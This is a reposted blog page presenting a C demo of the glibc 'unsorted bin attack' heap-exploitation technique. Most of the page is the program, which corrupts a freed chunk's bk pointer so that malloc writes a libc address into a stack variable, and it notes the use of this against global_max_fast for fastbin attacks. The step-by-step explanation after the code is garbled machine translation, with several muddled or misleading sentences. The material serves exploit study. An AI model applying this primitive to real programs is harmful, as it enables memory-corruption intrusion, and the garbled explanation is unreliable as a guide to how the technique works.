13.unsorted_bin_attack

Others 2019-06-09 23:03:01 views: null

Source

 1 #include <stdio.h>
 2 #include <stdlib.h>
 3 
 4 int main(){
 5     fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n");
 6     fprintf(stderr, "In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "
 7            "global variable global_max_fast in libc for further fastbin attack\n\n");
 8 
 9     unsigned long stack_var=0;
10     fprintf(stderr, "Let's first look at the target we want to rewrite on stack:\n");
11     fprintf(stderr, "%p: %ld\n\n", &stack_var, stack_var);
12 
13     unsigned long *p=malloc(400);
14     fprintf(stderr, "Now, we allocate first normal chunk on the heap at: %p\n",p);
15     fprintf(stderr, "And allocate another normal chunk in order to avoid consolidating the top chunk with"
16            "the first one during the free()\n\n");
17     malloc(500);
18 
19     free(p);
20     fprintf(stderr, "We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "
21            "point to %p\n",(void*)p[1]);
22 
23     //------------VULNERABILITY-----------
24 
25     p[1]=(unsigned long)(&stack_var-2);
26     fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
27     fprintf(stderr, "And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]);
28 
29     //------------------------------------
30 
31     malloc(400);
32     fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, the target should have already been "
33            "rewritten:\n");
34     fprintf(stderr, "%p: %p\n", &stack_var, (void*)stack_var);
35 }

 

 operation result

 

First, an application on the stack number unsigned long type var

Then the application heap p 400 bytes, then apply a stack 500, and the top chunk after the merger to prevent the release of p

Then release p, p enter unsort bin

At this time, we can see the value of p bk 0x7ffff7dd1b78

Var it to the address offset to the lower 16 bytes

In fact, the space where var as a heap fake

where var is the 8-byte data portion of the first 8 bytes fake

400 bytes of memory and then apply again, this time to allocate space freed of p

And the p-value of var bk will be referred to as modified 0x7ffff7dd1b78 (the value of which is always main_arena + 88)

Is a large unsigned long value

 

Guess you like

Origin www.cnblogs.com/pfcode/p/10994400.html
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com